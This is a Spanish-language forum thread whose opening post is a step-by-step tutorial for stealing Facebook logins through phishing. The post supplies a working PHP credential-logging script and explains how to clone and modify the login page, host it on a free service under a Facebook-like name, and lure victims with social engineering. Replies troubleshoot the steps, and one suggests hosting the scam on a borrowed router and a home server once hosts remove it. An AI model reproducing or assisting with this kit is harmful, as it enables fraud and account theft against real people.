• General

  • Esta sección englobará diversas técnicas y campos de la seguridad informática moderna.
Esta sección englobará diversas técnicas y campos de la seguridad informática moderna.
 #479028  por lobo solitario
 
advertencia: No me hago responsable del mal uso que se le pueda dar al contenido aquí expuesta




¿que es el phishing?

Suplantación de identidad.

El termino Phishing es utilizado para referirse a uno de los métodos mas utilizados por delincuentes cibernéticos para estafar y obtener información confidencial de forma fraudulenta como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria de la victima.

El estafador, conocido como phisher, se vale de técnicas de ingeniería social, haciéndose pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo general un correo electrónico, o algún sistema de mensajería instantánea, redes sociales SMS/MMS, a raíz de un malware o incluso utilizando también llamadas telefónicas. https://www.infospyware.com/articulos/q ... l-phishing toda la información de que es el phishing y como protegerse



¿como hackear facebook mediante phishing?



PASO 1: Crear archivo Phishing.php (block de notas )

1. Incluso si usted no tiene ningún conocimiento de archivo PHP simplemente copia el siguiente script y lo guardara como phishing.php


:<?php
header("Location: https://www.facebook.com/login.php"&#41;;
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



PASO 2 : Creación de página index.html :

1. Abra la página de inicio de sesión de Facebook a continuación , haga clic derecho > Ver código fuente de página y pegarlo en el bloc de notas y guardarlo como
index.html



2. Abra el archivo index.html que con un bloc de notas y búsqueda ( pulsando Ctrl + F ) para: acción en él y sustituir la parte resaltada ( como en la siguiente captura de pantalla) con phishing.php



[[Imagen



3. Búsqueda ( pulsa Ctrl + F ) para: método en ella y reemplace la parte resaltada (post ) con get




Imagen



4. pon guardar como index.html y hace click donde dice codificación UTF-8

OJO SI LO GUARDAS SIN LA CODIFICACIÓN UTF-8 QUEDARA LA PAGINA CON FALTA DE AUTOGRAFIA Y CON SIGNOS DE PREGUNTA EN TODAS PARTES SI QUE POR ESO GUARDARLO CON CODIFICACIÓN UTF-8






Imagen






PASO 3 : Ahora crea un archivo de texto completamente en blanco con el nombre passwords.txt


Ahora usted tiene todas las siguientes tres archivos con usted:
1. phishing.php
2. index.html
3. passwords.txt






Paso 4 : Ahora tiene que hacer un sitio web



Le recomendé que http://miarroba.es/ porque es completamente gratuito de alojamiento con dominio gratis .

Ir a : http://miarroba.es/ y haga click en donde dice Regístrate y completa lo siguiente como la captura de pantalla


Imagen





2. Ahora vea su cuenta de correo electrónico que usted dio y confirme su cuenta con el enlace de confirmación .





3. subir los archivos (index.html) (passwords.txt) (phishing.php) ya que esten adentro de su cuenta miarroba van donde dice hosting si no lo encuentran entren en http://hosting.miarroba.es luego van donde dice nuevo espacio dan click saldrá algo así

Imagen



llenan los datos les recomiendo que en Dirección de la página web: pongan algo relacionado con facebook como facebooksoporte o como quieran solo es para hacerlo un poco mas creible





ahora si a subir los archivos (index.html) (passwords.txt) (phishing.php)



van donde dice 1 espacio alado de nuevo espacio dan click y saldrá el nombre que pusieron en Título de la página web bueno le dan en administrar y saldrá algo muy parecido a esto van donde dice webFTP



Imagen






ay dos carpetas hacen click donde dice web abren la carpeta estará sin archivos


Imagen



buno hacen click donde dice subir y marcan el archivo (index.html) ya que se aya subido el index suben el archivo (passwords.txt) y luego el archivo (phishing.php) bueno quedaría algo así





Imagen





AHORA DAN CLICK DONDE DICE INDEX.HTML Y LOS LLEVARA A UNA PAGINA IGUAL A FACEBOOK QUE PARECE LEGITIMA Y LISTO ENVÍAN EL LINK DICIENDO NOSE UN EJEMPLO ME PUEDES AYUDAR CON MI PAGINA DALE ME GUSTA POR FAVOR (ingeniería social)

la pagina falsa


Imagen




AHORA CUANDO LA VICTIMA YA PUSO SU DATOS COMO CORREO ELECTRONICO CONTRASEÑA YA QUE PUSO INICIAR RECIÉN SE VA ALA PAGINA ORINAL DE FACEBOOK


Imagen


Imagen



¿ahora como reviso el correo y la clave que ingreso la victima?




muy fácil ay dos opciones de revisarlas


1. poniendo despues de el url passwords.txt como esta captura



Imagen





2. abren miarroba van donde dice a su hosting creado van donde dice webFTP abren la carpeta web marcan la casilla donde dice passwords.txt hacen click donde dice accion y hacen click donde dice editar

Imagen


Imagen



toda duda del contenido enviarme un mensaje a [email protected]
 #479784  por KuBrY
 
No entiendo lo que explicas que busquemos en el paso 2º en el bloc de notas, me dice que busquemos: 2. Abra el archivo index.html que con un bloc de notas y búsqueda ( pulsando Ctrl + F ) para: acción en él y sustituir la parte resaltada ( como en la siguiente captura de pantalla) con phishing.php
 #479951  por Bibeto
 
KuBrY escribió:tengo un problema con el paso 2º, creo que escribiste mal y no se que buscar en el bloc de notas
Lo que tienes que buscar es la palabra 'action' en el bloc de notas donde copiaste la página de inicio de facebook y remplazar lo que está entre las comillas

action="esto es lo que tienes que remplazar"
action="Phishing.php"

PD: Pensé que era tutorial del amigo @Solitario xD jajajajaja ya se me hacía raro que publicara algo así

 #480040  por KHC
 
Lo mas viejo del mundo.
Muchos frameworks ya ofrecen todo lo que explica @lobo solitario con unos cuantos next next next.
Saludos!
 #480193  por n0z
 
Adwind, me interesa el metodo que indicas, quieres elaborar en como va, me imagino que es mediante el .php correcto?
 #486735  por Pepe8
 
Escral escribió:Not working , el host lo detecta como phishing y lo borra , algún host para subir el scam?
Wifi prestada con acceso a la configuración del router para poder redirigir tráfico y abrir puertos a tu ip, y montar un servidor propio con apache por ejemplo, redirigirlo con un dns dinámico, y montarlo en una raspberry pi por el tema del bajó consumo 24x7.